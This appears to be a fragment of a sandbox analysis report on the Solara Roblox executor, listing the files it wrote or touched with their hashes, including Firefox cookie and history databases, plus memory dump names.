| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_1
| MD5 | d0d388f3865d0523e451d6ba0be34cc4 |
| SHA1 | 8571c6a52aacc2747c048e3419e5657b74612995 |
| SHA256 | 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b |
| SHA512 | 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17 |
memory/1236-3422-0x00007FFDD8290000-0x00007FFDD8291000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\DawnCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 5c32bdb82cf36ae82c2558a1aa589081 |
| SHA1 | 3153f65889afef2167f5e9a4f2211f12c490da08 |
| SHA256 | 2e9fd5566305587928819abfed178ee60521bd3526cbb5e701398764e46a3e49 |
| SHA512 | 118d78b2f24b9916eae27459f0f3ec522f17fa7b3babaee6c440bb0d87b1d07c7d3cdcbe90c36a0df232d0361336b2ddeb2df6b7d8ab877427d4c4f4e0a12775 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\index.html
| MD5 | 08d9ac1e35385587b0c3c8a73ea97234 |
| SHA1 | d1db15b5e97152be999339d90630f68ed06a6b78 |
| SHA256 | 016cadaa9a8494b15efea920a5ea9c02b441e90dbc7c444e73db3b307f93a741 |
| SHA512 | 8061a5a92f828642ea2fcb319571efa406ed67a75b4d4da1aeb3da96391a72fcde670e3e52efef62d37ddc17f7eca5afa0d35aa02bfd1bcadd8e86240cb802a6 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\loader.js
| MD5 | 8a3086f6c6298f986bda09080dd003b1 |
| SHA1 | 8c7d41c586bfa015fb5cc50a2fdc547711b57c3c |
| SHA256 | 0512d9ed3e5bb3daef94aa5c16a6c3e2ee26ffed9de00d1434ffe46a027b16b9 |
| SHA512 | 9e586742f4e19938132e41145deec584a7b8c7e111b3c6e9254f8d11db632ebe4d66898458ed7bcfc0614d06e20eb33d5a6a8eb8b32d91110557255cf1dbf017 |
memory/6464-3457-0x0000000180000000-0x0000000180A5B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
| MD5 | c3ca08efbdf890821b70d2cc4786aff0 |
| SHA1 | 81b5aa707651fe880f1ff3d10a51d8ce5aefc81a |
| SHA256 | c5b84b8af9b40b4da741e0dd92cc873549465f76d627f647f72f36e87e62a297 |
| SHA512 | 2a8d032e231c32c30292cc889747eeeebf54379379027237bc9e8f71629731df97fdbcca4a4ef60b71c10a602b1a342c556a7e1579b8fe63fb4fe16d38d0e6a4 |
memory/6244-3490-0x000001DEC5390000-0x000001DEC543D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\editor\editor.main.js
| MD5 | 9399a8eaa741d04b0ae6566a5ebb8106 |
| SHA1 | 5646a9d35b773d784ad914417ed861c5cba45e31 |
| SHA256 | 93d28520c07fbca09e20886087f28797bb7bd0e6cf77400153aab5ae67e3ce18 |
| SHA512 | d37ef5a848e371f7db9616a4bf8b5347449abb3e244a5527396756791583cad455802450ceeb88dce39642c47aceaf2be6b95bede23b9ed68b5d4b7b9022b9c8 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\editor\editor.main.css
| MD5 | 233217455a3ef3604bf4942024b94f98 |
| SHA1 | 95cd3ce46f4ca65708ec25d59dddbfa3fc44e143 |
| SHA256 | 2ec118616a1370e7c37342da85834ca1819400c28f83abfcbbb1ef50b51f7701 |
| SHA512 | 6f4cb7b88673666b7dc1beab3ec2aec4d7d353e6da9f6f14ed2fee8848c7da34ee5060d9eb34ecbb5db71b5b98e3f8582c09ef3efe4f2d9d3135dea87d497455 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\editor\editor.main.nls.js
| MD5 | 74dd2381ddbb5af80ce28aefed3068fc |
| SHA1 | 0996dc91842ab20387e08a46f3807a3f77958902 |
| SHA256 | fdd9d64ce5284373d1541528d15e2aa8aa3a4adc11b51b3d71d3a3953f8bcc48 |
| SHA512 | 8841e0823905cf3168f388a7aeaf5edd32d44902035ba2078202193354caf8cd74cb4cab920e455404575739f35e19ea5f3d88eab012c4ebefc0ccb1ed19a46e |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\basic-languages\lua\lua.js
| MD5 | 8706d861294e09a1f2f7e63d19e5fcb7 |
| SHA1 | fa5f4bdc6c2f1728f65c41fb5c539211a24b6f23 |
| SHA256 | fc2d6fb52a524a56cd8ac53bfe4bad733f246e76dc73cbec4c61be32d282ac42 |
| SHA512 | 1f9297eb4392db612630f824069afdc9d49259aba6361fb0b87372123ada067bc27d10d0623dc1eb7494da55c82840c5521f6fef74c1ada3b0fd801755234f1f |
memory/6464-3535-0x0000000180000000-0x0000000180A5B000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 44168a9ee780c4fed10fd13f50c1774f |
| SHA1 | c77e7883d2ae21ae492ca4aa17215217978b438e |
| SHA256 | 9148f4dc37c9b8148c65abfd10c1ccba3fd3c4d54616d3fdbaab245461f17e11 |
| SHA512 | 854b03386cbb6cec150f856ac2ca031cb4b7390ed80b285aead4a1cff70f0acef4e01727bfc0827dcae84ec7fa4942f19bc5ee0e0f78562f2107fe7084873b07 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Preferences
| MD5 | 0b7b23724541df69f5af3bb98c64e2aa |
| SHA1 | 9cd9584355badfc9870a379ec58eefec77b91cca |
| SHA256 | 2c9acfd2feff9ba14b74ceb006dfc9c447e12f6ad91b014c6052c06485d30db2 |
| SHA512 | c93c476a9a96a36d1eaf067252d5c769f05fbd9e949bddfae58a9e196afe0236209ce4b8552bf86a78769498983e12623e546d10fe25c185a35b803acc507193 |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Preferences~RFe5b1c6e.TMP
| MD5 | d8084196715e3df968ccaee882cd547a |
| SHA1 | 1960e575d363adfed647b4ac434b00c99d45cb7b |
| SHA256 | 51051a256bace58b3309dad046945c246db097d05f17423deb9092f02b9d16c9 |
| SHA512 | 7631e4dc85faa46977f2bf7545450d4b5c0ec8d943d2855437a6f61aa83df6d9c987a84a6fe3c08ea308c4f0c0bff434f04c307fb9c12479cedf32f5b2d11b13 |
memory/2108-3565-0x0000000009BA0000-0x0000000009CC0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\default\https+++www.roblox.com\ls\usage
| MD5 | d11d8178bbbb7fc2cb2dd8cdbdf4602c |
| SHA1 | 4087d523a9bfd291a9eb436f6a94c1b48c5e0624 |
| SHA256 | 5ea3156b9c3f3a44ef85ccdb2eacbcf5a0ef9735dde8ffa87415475eec069c87 |
| SHA512 | 54f26b7b0b19cb303d06faa94fa9a5310bc12325dc4f4db975f72b9a68d4234cc19e11f3646d3b63410d0e1ed52f7710ed04f90a2e1aa332416a589ff7bf8b8f |
memory/2108-3569-0x0000000006980000-0x000000000698C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\places.sqlite
| MD5 | 217b4a8381d213cb6be66096e04afea9 |
| SHA1 | cabc1025b7ec661cfba37b97f8f9467a1c0298a2 |
| SHA256 | 39af005f2c75ea390f58132998f931fd672b378cc9dc45d211fb453cf0731332 |
| SHA512 | 824eefd6a76e233fcbe72792f2a4a6e9339181aaa6a1e0b46c6b0edddda9e408bea6254d9c81959375ee89d276e2e3f6a9eff70fb488a6ad93d0998a9cdc0c39 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\cookies.sqlite
| MD5 | 407c4caa0ee19e49a0e72b90bee2629d |
| SHA1 | f6b571187feade16810087aa8e81bf9de2c37651 |
| SHA256 | e4d408d124dc9a26b0bd405f480790007530b474b4092994ffa35c1cd503b42c |
| SHA512 | af19fabaa9370ec8b36a85d95ba27136b7927fe5c001ebf8bcf01b3d48b584649c607f511d1f8f129d588fd218807e4a9bc735ff3e8f76f2b99365127c85a3fa |
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State
| MD5 | 4a681482560b73baa9ac3b15e1fdabcf |
| SHA1 | 388d14805fb1d1caf97667ef31495f0b15cac005 |
| SHA256 | 26ac241cebb36e7b9eb346ec282e41fc6aa6cac356e0617bd2bd9a22de0a9d75 |
| SHA512 | fbe26df0dd3af32e7d7fcb73dfc11a6afd3c7197d3d95a669bb31cb480034317e880069348212fa771a6836bf86ae62fa71eb112a869bc75b84d321d3ba4564a |
memory/6464-3627-0x0000000180000000-0x0000000180A5B000-memory.dmp
memory/6464-3629-0x0000000180000000-0x0000000180A5B000-memory.dmp
C:\Users\Admin\Downloads\RobloxPlayerInstaller.OMvsXMKO.exe.part
| MD5 | b27c831bf9142b6109d3983fcd3b7795 |
| SHA1 | 313194403b8f2538c804429fcd41780855a5c45c |
| SHA256 | 067a086fe23614d5ab09fd54b8b463c0c92a4230b317e852d3a51056a6eadd60 |
| SHA512 | 88a0a00f0ff32f05b64f410350994bfacd67dc57cffa49bc5a94867c598973c2ee69558a5e56b12d998306dd9f73a6f18dea0359e9495c3c90037315845c018b |